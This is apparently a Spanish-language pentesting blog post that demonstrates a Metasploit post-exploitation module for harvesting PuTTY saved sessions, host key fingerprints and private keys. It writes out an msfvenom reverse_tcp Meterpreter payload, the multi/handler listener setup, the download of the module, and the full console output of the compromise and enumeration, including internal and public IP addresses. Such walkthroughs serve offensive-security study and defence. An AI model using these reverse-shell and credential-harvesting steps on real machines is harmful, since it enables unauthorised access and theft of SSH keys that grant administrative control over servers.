Módulo de Metasploit para enumerar las sesiones guardadas de PuTTY

Hoy en día en entornos corporativos se utiliza mayoritariamente estaciones de trabajo con Windows 7 y el cliente PuTTY para acceder por SSH a servidores Linux. Para nosotros los "malos" es capital poder obtener las credenciales que utilizan los usuarios para acceder a esas máquinas ya que, o bien son técnicos de sistemas y las usan para administrar toda o gran parte de la infraestructura, o bien son desarrolladores que suben el código fuente o incluso administran aplicaciones concretas.

Yes... the PuTTY CLUB exists...

Stufus ha desarrollado un módulo de post-explotación para Metasploit que extrae información *muy útil* de PuTTY y Pageant (el primo-agente SSH de PuTTY): enumera las sesiones guardadas y los fingerprints de confianza y obtiene las claves privadas. Yo he convencido a un amigo administrador que usa PuTTY para probar el módulo XD, así que vamos a ello...

Primero genero el payload, sin necesidad de hacerlo FuD, porque mi amigo lo va a ejecutar desactivando el AV previamente (gracias amigo):

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.206.128 LPORT=80 -f exe > shell.exe

Luego pongo la oreja y espero plácidamente que llamen a la puerta:

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.206.128
LHOST => 192.168.206.128
msf exploit(handler) > set LPORT 80
LPORT => 80
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j -z
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.206.128:80 
[*] Starting the payload handler...
msf exploit(handler) > 

msf exploit(handler) > 
[*] Sending stage (885806 bytes) to 192.168.206.1
[*] Meterpreter session 1 opened (192.168.206.128:80 -> 192.168.206.1:15655) at 2015-08-26 11:22:02 -0400

Vale, ya tenemos la chell remota como podéis comprobar:
msf exploit(handler) > sessions -l

Active sessions
===============

  Id  Type                   Information                   Connection
  --  ----                   -----------                   ----------
  1   meterpreter x86/win32  DOMINIO\amigo @ PC123-21  192.168.206.128:80 -> 192.168.206.1:15655 (192.168.206.1)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

Antes de seguir, como el msfupdate no me añade este módulo (todavía), vamos a traerlo a cascoporro:

root@kali:/# mkdir -p $HOME/.msf4/modules/post/windows/gather/
root@kali:/# curl -Lo ~/.msf4/modules/post/windows/gather/enum_putty_saved_sessions.rb https://raw.githubusercontent.com/stufus/metasploit-framework/8b8ed04a73611456cc52b809c967334d88284843/modules/post/windows/gather/enum_putty_saved_sessions.rb
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 11206  100 11206    0     0  23177      0 --:--:-- --:--:-- --:--:-- 23152

Recargamos:
msf exploit(handler) > reload_all 
[*] Reloading modules from all module paths...

Y estrenamos nuestro nuevo módulo:
msf exploit(handler) > use post/windows/gather/enum_putty_saved_sessions 

msf post(enum_putty_saved_sessions) > set session -1
session => -1
msf post(enum_putty_saved_sessions) > run

[*] Looking for saved PuTTY sessions
[*] Found 14 sessions

PuTTY Saved Sessions
====================

 Name                   HostName               UserName  PublicKeyFile  PortNumber  PortForwardings
 ----                   --------               --------  -------------  ----------  ---------------
 checkpoint1            192.168.10.30                                      22          
 checkpoint2            192.168.8.30                                       22          
 srv23sa                192.168.15.8                                       22          
 srv24sa                172.40.15.8                                        22          
 kali                   192.168.206.128                                    22          
 kali2                  172.20.15.203                                     223         
 pc2563_mad1_b1         192.168.107.19                                       22          
 pc2563_mad1_b2         192.168.107.18                                       22          
 pt121_bcn_b1           172.40.15.12                                       22          
 pt121_bcn_b2           192.168.15.12                                      22          
 kalandrid              192.168.0.30                                       22          
 sobera2                192.168.17.23                                        22          
 rojo231                192.168.0.25                                       22          
 srv45sa                  srv45sa.local                                      22          

[*] PuTTY saved sessions list saved to /root/.msf4/loot/20150826114650_default_192.168.206.1_putty.sessions.c_738014.txt in CSV format & available in notes (use 'notes -t putty.savedsession' to view).
[*] Downloading private keys...

[*] Looking for previously stored SSH host key fingerprints
[*] Found 28 stored key fingerprints
[*] Downloading stored key fingerprints...

Stored SSH host key fingerprints
================================

 SSH Endpoint              Key Type(s)
 ------------              -----------
 172.40.15.8:22             rsa2
 192.168.15.8:22             rsa2
 192.168.0.25:22            rsa2
 172.16.0.1:22             rsa2
 192.168.177.128:22        rsa2
 192.168.8.30:22             rsa2
 88.26.211.211:22          rsa2
 srv45sa:22                  rsa2
 192.168.142.130:22        rsa2
 192.168.107.18:22           rsa2
 192.168.10.30:22             rsa2
 192.168.0.30:22            rsa2
 192.168.107.19:22           rsa2
 192.168.15.12:22            rsa2
 172.40.15.12:22            rsa2
 192.168.17.22:22            rsa2
 192.168.242.128:22        rsa2
 192.168.242.129:22        rsa2
 192.168.0.15:22            rsa2
 83.59.38.78:22            rsa2
 83.36.133.215:22          rsa2
 81.39.79.95:22            rsa2
 172.20.15.202:22           rsa2
 172.20.15.201:22           rsa2
 172.20.15.203:22           rsa2
 192.168.1.33:22           rsa2
 192.168.17.23:22            rsa2
 192.168.206.128:22        rsa2

[*] PuTTY stored host keys list saved to /root/.msf4/loot/20150826114656_default_192.168.206.1_putty.storedfing_883782.txt in CSV format & available in notes (use 'notes -t putty.storedfingerprint' to view).

[*] Looking for Pageant...
[+] Pageant is running (Handle 0x0)
[*] Post module execution completed

Fuente: https://github.com/rapid7/metasploit-framework/pull/5359

4 comentarios :